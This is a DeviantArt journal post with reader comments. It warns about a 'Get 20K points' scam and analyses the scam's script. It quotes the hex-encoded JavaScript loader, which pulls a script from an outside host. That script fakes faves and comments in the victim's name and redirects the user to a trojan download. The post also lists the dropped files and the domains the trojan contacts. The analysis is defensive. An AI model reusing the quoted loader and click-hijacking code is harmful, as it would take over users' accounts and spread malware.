Shop Mobile More Submit  Join Login

Stop the "Get 20K points" invasion



Before you do anything stupid, please read this

Obviously, this offer is swindling.
And as such it is dangerous for you !

table of contents


  • What it does
  • And then what ?
  • What can we do ?
  • "I installed it, but I'm okay"
  • "OMG my brother did it !"
  • Updates
  • What it does

    "\x61" is just another way to write "a" (ISO hexadecimal encoding) Thus, ["\x73\x72\x63","\x73\x63\x72\x69\x70\x74","\x63\x72\x65\x61\x74\x65\x45\x6C\x65\x6D\x65\x6E\x74","\x61\x70\x70\x65\x6E\x64\x43\x68\x69\x6C\x64","\x62\x6F\x64\x79","\x68\x74\x74\x70\x3A\x2F\x2F\x64\x65\x76\x69\x61\x6E\x74\x61\x72\x74\x2E\x68\x70\x2E\x61\x66\x2E\x63\x6D\x2F\x67\x65\x6E\x65\x72\x61\x74\x6F\x72\x2F\x6D\x69\x78\x2E\x6A\x73"] is just written words. Script actually. You can have it safely translated by using the "unescape" Javascript function, on this part of the script only. Once translated, this script does one thing : it includes a bigger, more elaborated script as being part of the DA page. This script can be found here : deviantart.hp.af.cm/generator/… This script will now be able to act in your name Note that this script is NOT hosted by deviantart.com website. It is a foreign website, hosted in Cameroon (Africa), in such a way that the smugglers can't be found by regular simple investigations. They are hiding, and hiding well. This new script does something else. For now (but it might change) : document.getElementById("gmi-ResourceViewFaveButton").click(); It simulates click on the "Fave" button. document.getElementById("commentbody").value="It actually works! Wohoooooooo! Thanks!"; It writes (in your name) a fake comment saying "It actually works! Wohoooooooo! Thanks!". setTimeout("document.getElementsByClassName('ll f')[0].click()", 100); It programs something that will hide this actions by reopening the comment area once it is posted. document.getElementsByClassName("smbutton smbutton-blue smbutton-big comment-submit")[0].click(); It validates the comment (in you name). window.top.location.href='deviantart.hp.af.cm/generator';
    alert('DeviantART: Welcome to deviantART\'s Points Generator! You will be redirected to our generator. Click OK to proceed')
    It programs a redirection to their website and displays an alert that says "DeviantART: Welcome to deviantART\'s Points Generator! You will be redirected to our generator. Click OK to proceed"

    And then what ?

    And then you wont get any DA points, indeed. I bet you guessed yet… Instead, they will say to you "Oh, you don't have this so great plugin, come and download it !", launch the download anyway. And this is where you get screwed if you are gullible enough to run an executable file from a random site hidden in Cameroon… I don't know (yet) what this exe file does. But I know what it could do. First of it might be (and probably is) a security breach on your computer. Trojan, virus, remote agent… Which in turn could be aimed at several things : spreading this publication so that other get screwed, stealing personal information (such as payment card numbers), using your computer as a proxy for networks attacks… If you already downloaded the file, please, be very careful. Use antiviral detection and malware removal on your computer now, and in a few days. Firewall protection is a must have. The malware might steal your "cookie" too. This means that your password might be compromised. Actually not only for deviantArt.

    What can we do ?

    For now, we can try to warn and inform people. Try to make them stop spreading this stupid hoax. If you have any idea of what more to do, please, comment.

    "I installed it, but I'm okay"

    Are you so very sure of this ? FYI, virustotal.com ran a virus detection on the exe file using 45 antivirus and states that only 3 of the 45 antivirus he tested found a threat. Report can be found here : see the virustotal report Now, do as you want.

    "OMG my brother did it !"

    I did not download/run that exe file, am I safe ?

    As far as I know
    • There was no harmful code in the JavaScript stuff that I saw, but it can change at any time
    • Any reasonable browser should not be able to execute a downloaded file without warning you before (and the "plugin" stuff is AFAIK only fake div displayed as part of the internet webpage, then not harmful)
    • I think that the only thing really endangered by the JavaScript is your session cookie, then changing you password might be wise.
    • I have heard of other more sophisticated attacks like buffer overflowing and stuff, but I'm not competent enough to tell you if there is such a threat. Then consider you are not safe until someone can tell us whether there is such a potential threat.
    Thus I would say that as far as I know, you should be relatively safe, but I also know that this is a huge field and that I'm no pro. So you should consider being careful, and having antiviral + firewall protection up to date on your computer (as everyone else).

    Connected Viruses/Malware/Adware identified

    One or several of these malwares might have been dropped on you computer if you had this exe file run on your computer :
    • Trojan
      • Identified by Emsisoft as Trojan.MSIL.Spy.Agent.AMN (A)
      • Identified by Fortinet as MSIL/Agent.HG!tr.spy
      • Identified by ESET-NOD32 as a variant of MSIL/Spy.Agent.HG
      • Identified by many other malware detectors as Trojan.GenericKD.966175
      • This is a serious threat
      • This is a Trojan, which means it is a malicious software spying your computer and sending (or giving access to) this data to malicious people. See the Internet Holy Bible for reference.
      • Some antivirus are free. See the Mighty Source of all Truth for reference.
      • Fresh news here thanks to ~krisiskiller101 investigations !
        • He was able to get rid of it using MalwareBYTES
        • He confirmed that RASMan service was up on his computer. Though, this service is not supposed to be harmful and might have been up before. It might also be part of the trojan attack that was not turned back up by the fix because it is not harmful alone.
        • Thanks for the info !
    • AdWare.iBryte.H
      • seems to be a recent version of wellknown adware iBryte
      • Only comodo antimalware seems to identify it. Maybe ESET-NOD32 too.
      • Be very careful as searching for "iBryte.H removal" can lead to spywareprotectiontool.com which is a malicious website giving you malware instead of solutions
      • You can find instructions for this adware removal, searching for "iBryte removal", but I don't know if they would work with this version of the adware (please, tell us if you have any success with one of these procedure)
    • Optimum Installer (fs)

    Personal investigations

    I don't have a packed solution. And I won't probably have time enough to investigate thoroughly this stuff. Yet, I found some hints, by diving modestly into this sh*t. I share it for people that it might help. This program does the following :
    • It mess up your registry in a theatrical way
      • It probably affects the download manager associated with your web browser
      • It probably affects the toolbars in your web browser
      • Writes 'test' everywhere in the registry
      • Mess up with your ie cache
    • Creates files
      • Create an executable file named "D2M-Precheck.exe", hidden in "C:\Document and settings\Your_User_Name\Local Settings\Temp"
      • Create an executable file named "check_offer_rp.dll", hidden in "C:\Document and settings\Your_User_Name\Local Settings\Temp"
      • Create copies of these two files in a subdirectory of "C:\Document and settings\Your_User_Name\Local Settings\Temporary Internet Files\Content.IE5\"
    • Runs the created exe file, which in turn spoils your computer :
      • Creates a new "exe" file named "Impressioner.exe" along with a "System.Data.SQLite.dll" and "imp.dat" files, hidden at the same place : "C:\Document and settings\Your_User_Name\Local Settings\Temp"
    • Transfers data through internet with following addresses
      • imp.oi-imp1.com
      • config.oi-config1.com
      • d1uc4fr8hoy8ts.cloudfront.net
      • cdn.install.oibundles2.com (the only thing done here is downloading the dll file stated before)
      • cache-download.real.com
      • d2m.adk-mobile.com
    • Probably displays advertising
    Be careful : this is not an exhaustive list. And all that is listed above is not necessarily harmful (e.g. SQLite.dll is just a database they use, not a virus itself, probably). Do not edit your Registry if you don't know exactly what you are doing. Moreover, I have no idea on what this "impressioner.exe" does. Then there might be a lot more mess to clean. By the way, if you were infected and are able to find this file, please, consider sending a copy of it to me. -edit- Okay, it will be hard to find this file on your drive : this file "does something" (including turning up RASMAN Service) and deletes itself. This is really not comforting. This said, and with no guarantee of any kind, "do it at your own risks" and stuff, I think that you can safely delete the exe and dll files mentioned above. It might get you rid of part of the infection. If you have more information or if you can teach me something on this kind of investigations, please, contact me, I will update. This information might even be wrong depending on your OS and configuration !

    Updates

    • There is at least 2 scripts, now : mix.js and nr.js (second one only fav without leaving a comment)
    • There is at least two messages spreading this sh*t
    • It seems I was totally wrong thinking that infected people were spreading those messages. It is more probably bots registering and posting every x seconds
    • Mutations !
      • The scam changed in form. Now has many titles including :
        • Free 20k dA Points Is Here!
        • dA Points For Free
        • Learn How To Get dA Points Instantly!
        • Instant Free dA Points!
        • Get dA Points Without Buying!
      • But content changed too
    • New Script generator/stript.js
      • Looks like they leveled up
      • As far as I understand it, it will make your browser all busy and unresponsive and during this time it will poop comments on as many other submissions as possible
      • Theses comments are more spam messages redirecting to their malware download website
      • I think that this script only use you as a means for spreading the spam and does not lead you to the malware download.
      • However, the spam that will be pooped by your account on other's deviations will lead to the malware
      • After careful testing (by deactivating the malicious part while keeping the core of the script), I can confirm, adding that during the browsing/commenting it displays fake information as a cover hiding what is going on.
      • It is relatively efficient. During the few seconds (between 5 and 10) of my test I would have posted 5 milicious comments
      • If it happened to you
        • You should be able to find the scam post from where you messed up as you faved it
        • From there, using the "next" button which is on top of the screen near the deviantART logo, you will be able to browse the deviations that you have scammed
        • Delete/hide your offensive comments
    • What does the admin ?!
      • ~peppy-heppy asked them and here is the answer he received
      • "We've checked over the activity associated with this profile and have found that it does qualify as a type of "spamming" so we have banned this account, along with others we've found to be doing the same. We're currently investigating new methods in dealing with this issue and hopefully bringing it to a stop. Until then, we'll continue to handle the problem as fast as we can.

        Please let us know if you find this sort of thing happening again. Thank you!"
    Thank for reading.
Trying to get this hoax propagation slowed down…

Thanks to :iconkrisiskiller101: ~krisiskiller101 for the vm test report !

(by the way, english is not my native language, so if you can't understand some part of this article, please, report it so that I can correct it and improve my english !)
Add a Comment:
 
:icondamariobros1:
Damariobros1 Featured By Owner Edited Apr 6, 2017
ESET Smart Security 9 is the best Anti-Virus Program out there. To make sure that you find it, open ESET, click the second tab on the side, and click "Custom Scan". Click "Local Disk (C: )" and then click the drop-down box that currently says "Smart Scan" and click "In-Depth Scan". Finally, click "Run as Administrator" (It should have the little Windows Administrative Permissions Shield next to it) and click "Yes". The scan will take 5 hours at the very least, but that is because it is searching every bit (data size that 8 of them equals 1 byte, not "every bit") of every single file 5 times before moving to the next file, and being very thourough in its search. It will also be able to access more files from having Administrative Privelages (Run as Administrator), so that makes it ten times longer. When it FINALLY DOES complete the scan, the threat should be there and queried, which means it has been safely confined/stored and disabled by ESET and sent to an ESET Research Center for analysis. All you have to do now is send it to NUL and permanently delete it from your computer, without taking it out of the query list. It should also fix all the damage done to your computer automatically. I am telling you this from personal experience. Use ESET for this Trojan/Bug/Whatever you call it to get rid of it. BTW I don't know if it will work on iOS, but it definently is compatible with Windows.
Reply
:iconsaliohoytia2525:
Saliohoytia2525 Featured By Owner Aug 28, 2016  Professional General Artist
I have this ---> fav.me/dae3b9n
Reply
:icontnynfox:
Tnynfox Featured By Owner Jun 27, 2016  Student General Artist
An artist who digitally draws dog packs called out villapascoli.it for allegedly using her files to spread malware.  If that's true then, ouch.
I hope she's not blamed for the malware.
Pretty much anyone can collect images online, including malware crooks.
Reply
:iconhiqikura:
Hiqikura Featured By Owner May 10, 2016  Hobbyist Digital Artist
hahaha i coming!!!
Reply
:iconasfoxger:
AsFoxger Featured By Owner May 4, 2016  Hobbyist Digital Artist
They keep coming.

Everyone, keep reporting.
Reply
:icongrimm-girlie:
grimm-girlie Featured By Owner Apr 13, 2016
Whenever I see a new spammer I send them a note that says "what's it like to be dead inside" or depressing song lyrics and see if they answer.
Reply
:iconxfell:
xFell Featured By Owner Jul 21, 2017  Hobbyist General Artist
I wish I could like comments on deviantart, this made my day.
Reply
:icondshere:
Dshere Featured By Owner Mar 14, 2016
inger57423.deviantart.com/
Latest version of spammer.
He is using statictab.com as a dropsite.
I wonder what virus total would find on his time this time.
Reply
:icondshere:
Dshere Featured By Owner Feb 20, 2016
2016, and Retardo the Hackinator has been at it for several weeks again.
Reply
:iconflippyisadorable:
Flippyisadorable Featured By Owner Feb 14, 2016  Hobbyist General Artist
One time I tried to download something for free Animal Jam membership and ended up downloading CrossBrowse. Then my mom went on her Amazon account using it and a few days later, her account got hacked and her password was changed...   ._.
Reply
:iconflippyisadorable:
Flippyisadorable Featured By Owner Feb 14, 2016  Hobbyist General Artist
One time I tried to download something for free Animal Jam membership and ended up downloading CrossBrowse. Then my mom went on her Amazon account using it and a few days later, her account got hacked and her password was changed...   ._.
Reply
:iconyouvegotnoidea:
YouveGotNoIdea Featured By Owner Feb 3, 2016  Student Digital Artist
Spambot located: nebumav.deviantart.com/
Reply
:iconalphawolfheart:
AlphaWolfheart Featured By Owner Aug 10, 2015  Hobbyist Digital Artist
thank god, it can't run on Windows 10
Reply
:iconkaylarge-chan:
Kaylarge-chan Featured By Owner Mar 31, 2016  Hobbyist Digital Artist
I know right!
Reply
:iconcypher-boss:
Cypher-Boss Featured By Owner May 16, 2014
It didn't even download for me, so that's that! XD
Reply
:iconxyliarraina:
XyliarRaina Featured By Owner Nov 30, 2013  Hobbyist Traditional Artist
Thanks so much! I just found another one i was about to do! I forgot the name but it led me to an Isreali Website... I'll try to find it to see if it's in cahoots with this one.
Reply
:iconxyliarraina:
XyliarRaina Featured By Owner Nov 30, 2013  Hobbyist Traditional Artist
Ok I found that this post is basically the only thing in her (or his) gallery, and they just joined this week... should I report this person just in case?
Reply
:icondragonthing009:
dragonthing009 Featured By Owner Apr 28, 2016
yes
Reply
:iconponies21:
Ponies21 Featured By Owner Nov 18, 2013
Is this relevant or can someone tell me if it is real??m.youtube.com/watch?v=7N33-VLJ…
Reply
:iconlittleghostii:
LittleGhostii Featured By Owner Nov 13, 2013  Hobbyist Digital Artist
:icondeviantartpointshack:
Another e_o
Reply
:icondshere:
Dshere Featured By Owner Nov 2, 2013

Correction:

Fileice.net is where he is hosting his spamware.

fileice.net/download.php?t=reg…

fileice.net/mobiledl.php&f… <--------he's going after mobiles now

support@fileice.net <--contact email for the hosting service

Reply
:icondshere:
Dshere Featured By Owner Nov 2, 2013

gituvoga.deviantart.com/

gituvoga.deviantart.com/

 

And he has a new shortener gg.gg/freepoints.

Redirects to something that flashes on the screen as "fliece.com/download etc etc"

Reply
:iconaskinnywhiteguy:
ASkinnyWhiteGuy Featured By Owner Nov 2, 2013
IT HAS BEGUN AGAIN
Reply
:iconxssd:
XSSD Featured By Owner Aug 9, 2013
thank you
Reply
:iconderse-dreamers:
derse-dreamers Featured By Owner Jul 28, 2013
wow, i never knew this... i knew that it was a hoax [it was very obvious] but wow, thank you
Reply
:iconkarisean:
Karisean Featured By Owner Jul 3, 2013
Very informative. I've been really wondering what all those scam messages were really doing behind the scenes.
Reply
:iconguardian-aegislash:
Guardian-Aegislash Featured By Owner Jul 1, 2013  Hobbyist Digital Artist
Thank god someone posted something about this. These bots are getting annoying with this "Free 20k Points" thing. 
Reply
:iconaskinnywhiteguy:
ASkinnyWhiteGuy Featured By Owner Jun 30, 2013
Has the pestilence finally been exterminated???
Reply
:icongraphicsgail:
GraphicsGail Featured By Owner Jul 2, 2013
Plague and Black Death. :iconlolmemeplz:
Reply
:iconthedoggiediva:
TheDoggieDiva Featured By Owner Jun 29, 2013  Student Digital Artist
Yea I HATE this 20k points instructions thingy. STOP SPAMMING BOT!!!
Reply
:icongraphicsgail:
GraphicsGail Featured By Owner Jun 28, 2013
I will add anti-spam puzzles to my website and make it so no spammers can come.
Reply
:iconmariosonicanimefan:
Mariosonicanimefan Featured By Owner Jun 26, 2013  Hobbyist Digital Artist
Question:
What happens if you follow that hoax using your IPhone/IPod/Ipad?
Reply
:iconpetersong:
PetersonG Featured By Owner Jun 27, 2013
Seems it does not work at the moment, but the case seems to be handled, though. Might be broken only when I tried. Might be planned for later…
I've no IPhone/IPad/IStuff to test, then it's hard to tell for sure.
Reply
:iconmariosonicanimefan:
Mariosonicanimefan Featured By Owner Jun 27, 2013  Hobbyist Digital Artist
Oh .–. Then I must still be cautious about these Hoaxes while using my Ipad...
Reply
:iconpetersong:
PetersonG Featured By Owner Jun 27, 2013
Did your IPad download something ? Did it installed something ?
If not, I think you're relatively safe (because of the way they proceed, not using too offensive methods to install on devices until then)
Maybe you've only seen a screen speaking of accepting to fill a form that did not worked ?
Reply
:iconmariosonicanimefan:
Mariosonicanimefan Featured By Owner Jun 27, 2013  Hobbyist Digital Artist
Well,I didn't download anything,so I should be fine....
Reply
:iconoobenedictaoo:
OoBenedictaoO Featured By Owner Jun 23, 2013
Here it is another one [link]
Reply
:iconbluhbluhwords:
Bluhbluhwords Featured By Owner Jun 19, 2013  Hobbyist General Artist
Just found another one of the tutorials for this junk [link]
Reply
:iconpetersong:
PetersonG Featured By Owner Jun 20, 2013
The pointed address seems inactive, though.
Maybe we're rid of this junk in the end ^^'
Reply
:iconbluhbluhwords:
Bluhbluhwords Featured By Owner Jun 20, 2013  Hobbyist General Artist
That's what we all hope; But some people are just lurking and waiting to publish a new attack soon....
Reply
:iconpetersong:
PetersonG Featured By Owner Jun 22, 2013
Yes and they did : [link]
Though, they changed their address and now use facebook to host and spread their spam.

I think reporting this page could be a good idea :
[link]
Reply
:iconaskinnywhiteguy:
ASkinnyWhiteGuy Featured By Owner Jun 6, 2013
:iconsadplz: They’re…they’re back…[link].
God help us all.
Reply
:iconaskinnywhiteguy:
ASkinnyWhiteGuy Featured By Owner Jun 4, 2013
I haven't seen any of these in like a week...is it finally over now?
Reply
:icontripptaylor:
tripptaylor Featured By Owner Jun 1, 2013  Professional Photographer
[link]

what about this ?
Reply
:icondshere:
Dshere Featured By Owner May 26, 2013
Belay that.
Anklebite7 is no more.
Reply
:icondshere:
Dshere Featured By Owner May 26, 2013
[link]

Ankle7helen is the latest handle for this clown.
Reply
:icondshere:
Dshere Featured By Owner May 26, 2013
Currently the spammer is using appfog to obfuscate the url, teh appfog page is set to a simple redirect since Appfog has been blasting his pages on sight.
So teh redirect goes by unnoticed, and takes you to pagebin.
contact@pagebin.com is pagebin's email address.
Though they have said they don't mind "gurilla marketing" (sic)
They seem to believe that the guy is legitimate marketing.
Current pagebin suffixes for teh spammer are:
/ofP6Uevw
/DpolNpF3
/vNxMOPVS

Pagebin seems to have no intention of removing the malware spreading pages.
Reply
:iconhybridrex:
HybridRex Featured By Owner May 26, 2013  Hobbyist
I'm no programmer,but even I have to admit it's too easy to set up a account.As annoying as they are,
couldn't you make a user do a "CAPTCHA" puzzle to sign up?Or is there ways to get passed that?
Reply
:iconpkgam:
PkGam Featured By Owner May 26, 2013  Hobbyist General Artist
Whoa! This is a much bigger problem than I thought it was. Like, I've been seeing these spammers for a while, but I didn't know they were so well hidden. I figured they would soon be tracked down for their shenanigans, but they seem really troublesome. Hopefully one day they get stopped or simply get bored.
Reply
:iconraeki-eragon:
raeki-eragon Featured By Owner May 26, 2013  Hobbyist Artist
[link] here's another one... watch out
Reply
Add a Comment:
 
×

Featured in Collections

Journal and Posts by DameTenebra

Journal by ElenaMegan

Journals by Tnynfox


More from DeviantArt



Details

Submitted on
April 27, 2013
File Size
15.1 KB
Submitted with
Sta.sh
Link
Thumb

Stats

Views
13,408
Favourites
179 (who?)
Comments
259
×